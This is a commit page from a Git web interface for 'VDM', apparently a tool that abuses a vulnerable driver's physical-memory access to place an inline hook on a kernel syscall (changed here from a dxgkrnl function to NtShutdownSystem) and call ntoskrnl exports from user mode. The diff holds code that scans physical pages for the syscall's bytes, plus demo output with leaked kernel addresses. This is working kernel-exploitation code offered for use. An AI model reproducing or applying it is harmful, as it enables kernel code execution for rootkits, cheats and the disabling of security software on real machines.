IDontCode
/
VDM
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

switched back to use NtShutdownSystem

Browse Source
merge-requests/1/head
xerox 4 years ago
parent 08983dc37f
commit dcfadd1359
4 changed files with 17 additions and 13 deletions
Show Stats Download Patch File Download Diff File

13
README.md
Unescape View File

@ -15,7 +15,7 @@ whereas this project is. This project can be used more broadly then physmeme.
# Example # Example
In this example VDM syscalls into an inline hook placed on `dxgkrnl.NtGdiDdDDICreateContext` to call memcpy exported from ntoskrnl.exe. In this example VDM syscalls into an inline hook placed on `ntoskrnl.NtShutdownSystem` to call memcpy exported from ntoskrnl.exe.
#### Demo Code #### Demo Code
```cpp ```cpp
@ -44,10 +44,11 @@ std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
#### Demo Code Result #### Demo Code Result
``` ```
[+] drv_handle -> 0xb0, drv_key -> frAQBc8Wsa1xVPfv [+] drv_handle -> 0x100, drv_key -> frAQBc8Wsa1xVPfv
[+] NtGdiDdDDICreateContext physical address -> 0x0000000100ACA5F0 [+] NtShutdownSystem physical address -> 0x0000000002D0B1A0
[+] ntoskrnl base address -> 0xFFFFF80075200000 [+] NtShutdownSystem page offset -> 0x1a0
[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980 [+] ntoskrnl base address -> 0xFFFFF80456400000
[+] ntoskrnl memcpy address -> 0xFFFFF804565D5A80
[+] kernel MZ -> 0x5a4d [+] kernel MZ -> 0x5a4d
[+] press any key to close... [+] press any key to close...
``` ```
@ -59,7 +60,7 @@ hook by changing this variable inside of `vdm_ctx/vdm_ctx.h`.
```cpp ```cpp
// change this to whatever you want :^) // change this to whatever you want :^)
constexpr std::pair<const char*, const char*> syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" }; constexpr std::pair<const char*, const char*> syscall_hook = { "NtShutdownSystem`", "ntdll.dll" };
``` ```
### vdm::load_drv ### vdm::load_drv

1
VDM/main.cpp
Unescape View File

@ -19,6 +19,7 @@ int __cdecl main(int argc, char** argv)
std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str()); std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str());
std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load()); std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load());
std::printf("[+] %s page offset -> 0x%x\n", vdm::syscall_hook.first, vdm::nt_page_offset);
std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base); std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base);
std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy); std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy);

12
VDM/vdm_ctx/vdm_ctx.cpp
Unescape View File

@ -4,14 +4,13 @@ namespace vdm
{ {
vdm_ctx::vdm_ctx() vdm_ctx::vdm_ctx()
{ {
LoadLibraryA("user32.dll"); // required for win32u.dll... vdm::ntoskrnl = reinterpret_cast<std::uint8_t*>(
vdm::dxgkrnl_buffer = reinterpret_cast<std::uint8_t*>( LoadLibraryExA("ntoskrnl.exe", NULL,
LoadLibraryEx("drivers\\dxgkrnl.sys", NULL,
DONT_RESOLVE_DLL_REFERENCES)); DONT_RESOLVE_DLL_REFERENCES));
nt_rva = reinterpret_cast<std::uint32_t>( nt_rva = reinterpret_cast<std::uint32_t>(
util::get_kernel_export( util::get_kernel_export(
"dxgkrnl.sys", "ntoskrnl.exe",
syscall_hook.first, syscall_hook.first,
true true
)); ));
@ -47,11 +46,14 @@ namespace vdm
break; break;
if (!vdm::read_phys(reinterpret_cast<void*>(address + page), page_data, PAGE_4KB)) if (!vdm::read_phys(reinterpret_cast<void*>(address + page), page_data, PAGE_4KB))
{
std::printf("[+] failed to read phys...\n");
continue; continue;
}
// check the first 32 bytes of the syscall, if its the same, test that its the correct // check the first 32 bytes of the syscall, if its the same, test that its the correct
// occurrence of these bytes (since dxgkrnl is loaded into physical memory at least 2 times now)... // occurrence of these bytes (since dxgkrnl is loaded into physical memory at least 2 times now)...
if (!memcmp(page_data + nt_page_offset, dxgkrnl_buffer + nt_rva, 32)) if (!memcmp(page_data + nt_page_offset, ntoskrnl + nt_rva, 32))
if (valid_syscall(reinterpret_cast<void*>(address + page + nt_page_offset))) if (valid_syscall(reinterpret_cast<void*>(address + page + nt_page_offset)))
syscall_address.store( syscall_address.store(
reinterpret_cast<void*>( reinterpret_cast<void*>(

4
VDM/vdm_ctx/vdm_ctx.h
Unescape View File

@ -11,14 +11,14 @@
namespace vdm namespace vdm
{ {
// change this to whatever you want :^) // change this to whatever you want :^)
constexpr std::pair<const char*, const char*> syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" }; constexpr std::pair<const char*, const char*> syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
inline std::atomic<bool> is_page_found = false; inline std::atomic<bool> is_page_found = false;
inline std::atomic<void*> syscall_address = nullptr; inline std::atomic<void*> syscall_address = nullptr;
inline std::uint16_t nt_page_offset; inline std::uint16_t nt_page_offset;
inline std::uint32_t nt_rva; inline std::uint32_t nt_rva;
inline std::uint8_t* dxgkrnl_buffer; inline std::uint8_t* ntoskrnl;
class vdm_ctx class vdm_ctx
{ {

Write Preview
Loading…
Cancel
Save